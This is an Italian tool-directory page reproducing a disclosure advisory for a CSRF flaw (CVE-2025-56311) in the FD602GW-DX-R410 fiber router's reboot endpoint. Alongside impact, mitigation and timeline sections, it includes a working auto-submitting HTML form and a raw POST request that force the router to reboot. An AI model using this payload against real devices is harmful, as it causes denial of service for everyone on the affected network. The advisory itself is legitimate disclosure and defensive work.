Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-56311 — Vulnerabilità CSRF nel router FD602GW-DX-R410 permette a un attaccante remoto di riavviare il dispositivo tramite una richiesta POST manipolata a /boaform/admin/formReboot quando un amministratore è autenticato. | Kitploit
Strumenti/GitHubGitHub/wrathfuldiety/cve-2025-56311
Analisi delle VulnerabilitàExploitSicurezza WebPenetration TestingPaper e RicercaApprendimento e Formazione
GitHubwrathfuldiety/cve-2025-56311

CVE-2025-56311

Vulnerabilità CSRF nel router FD602GW-DX-R410 permette a un attaccante remoto di riavviare il dispositivo tramite una richiesta POST manipolata a /boaform/admin/formReboot quando un amministratore è autenticato.

Vedi Repository
211 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-56311: Advisory di Sicurezza – Vulnerabilità CSRF nella funzione di riavvio del router FD602GW-DX-R410

Proof of Concept e Advisory di Sicurezza per una vulnerabilità di Cross-Site Request Forgery (CSRF) nell'interfaccia di amministrazione del router fiber FD602GW-DX-R410 (Firmware V2.2.14). L'advisory delinea l'impatto, il vettore di attacco e le raccomandazioni per la mitigazione.

fd602gw-dx-r410-csrf-advisory

La vulnerabilità CSRF nel router FD602GW-DX-R410 consente a un attaccante remoto di riavviare il dispositivo tramite una richiesta POST manipolata a /boaform/admin/formReboot quando un amministratore è autenticato.


Panoramica

Una vulnerabilità Cross-Site Request Forgery (CSRF) è stata scoperta nella console di amministrazione web del router fiber FD602GW-DX-R410 (Firmware V2.2.14). L'endpoint /boaform/admin/formReboot accetta richieste POST che attivano un riavvio completo del dispositivo senza token CSRF o validazione dell'origine. Se un amministratore autenticato visita una pagina dannosa, il router può essere riavviato da remoto senza consenso.

  • ID CVE: CVE-2025-56311
  • Data di pubblicazione dell'advisory: Luglio 2025
  • Scoperto da: Hasanka Amarasinghe (Ricercatore di Sicurezza Indipendente)
  • Vendor: Shenzhen C-Data Technology Co., Ltd.
  • Prodotto interessato: FD602GW-DX-R410 Fiber Router
  • Versione Firmware: V2.2.14 (Build.1918.241111)
  • Versione Hardware: R410.1B
  • Versione Bootloader: V3.7-2312181457
  • Web Server: Boa/0.93.15
  • Vettore di accesso: Remoto (l'amministratore autenticato deve aver effettuato l'accesso)
  • Gravità: Media
  • Punteggio Base CVSS v3.1: 5.4 (Media)

  • Prodotto Interessato

    • Dispositivo: FD602GW-DX-R410 Fiber Router
    • Firmware: V2.2.14 (Build.1918.241111)
    • Componente: Gestore Riavvio - /boaform/admin/formReboot
    • Web Server: Boa/0.93.15

    Dettagli della Vulnerabilità

    • Tipo: Cross-Site Request Forgery (CSRF)
    • Vettore di attacco: Remoto (l'amministratore deve aver effettuato l'accesso alla propria sessione)
    • Autenticazione: Nessuna richiesta per l'attaccante (sessione amministratore richiesta sul browser della vittima)
    • Impatto: Riavvio non autorizzato del dispositivo
    • Persistenza dello stato: Sessione senza stato, probabilmente tracciata tramite IP o token di sessione interni

    Proof of Concept (PoC)

    Payload CSRF (HTML)

    root@kitploit:~
    <html>
      <!-- CSRF PoC - generated by Burp Suite Pro -->
      <body>
        <form action="http://192.168.1.1/boaform/admin/formReboot" method="POST">
          <input type="hidden" name="postSecurityFlag" value="+65535" />
          <input type="submit" value="Submit" />
        </form>
        <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
        </script>
      </body>
    </html>
    

    Richiesta HTTP

    root@kitploit:~
    POST /boaform/admin/formReboot HTTP/1.1
    Host: 192.168.1.1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 23
    
    postSecurityFlag=+65535
    

    Risposta

    HTTP 200 OK; Il router si riavvia immediatamente.


    Raccomandazioni

    • Implementare token CSRF e una validazione rigorosa di Origin/Referer su tutti gli endpoint di amministrazione.
    • Invalidare le sessioni obsolete o orfane e associare le sessioni a cookie sicuri.
    • Considerare l'uso di CAPTCHA o prompt di conferma prima di eseguire azioni distruttive come il riavvio.
    • Limitare l'accesso all'interfaccia di amministrazione solo a IP fidati o reti interne.

    Vettore di Attacco

    • Richiede che l'amministratore del router sia autenticato (abbia effettuato l'accesso).
    • Un attaccante induce la vittima a visitare una pagina web dannosa che attiva silenziosamente una richiesta POST all'endpoint di riavvio.
    • Il router accetta la richiesta falsificata e si riavvia immediatamente, causando un denial of service.

    Impatto

    • Denial of service a causa del riavvio forzato.
    • Perdita di disponibilità della rete per tutti gli utenti connessi.
    • Possibilità di concatenarsi con altri problemi (ad esempio, session hijack o XSS) per aumentare l'impatto.

    Cronologia della Divulgazione

    DataAzione
    Giu 2025Vulnerabilità scoperta
    Giu 2025Tentativo di divulgazione responsabile (nessuna risposta)
    Lug 2025Richiesto ID CVE a MITRE
    Lug 2025Advisory preparato e in attesa di pubblicazione
    Set 2025CVE Assegnato, Advisory reso pubblico

    Riferimenti

    • Vendor: Shenzhen C-Data Technology Co., Ltd.
    • Dispositivo: FD602GW-DX-R410
    • Firmware: V2.2.14
    • GitHub Advisory: https://github.com/wrathfulDiety/CVE-2025-56311

    Disclaimer

    Questo advisory è fornito a scopo educativo e di sensibilizzazione sulla sicurezza. L'autore non si assume alcuna responsabilità per un uso improprio. Tutti i test sono stati eseguiti in un ambiente controllato.

    Scarica lo strumento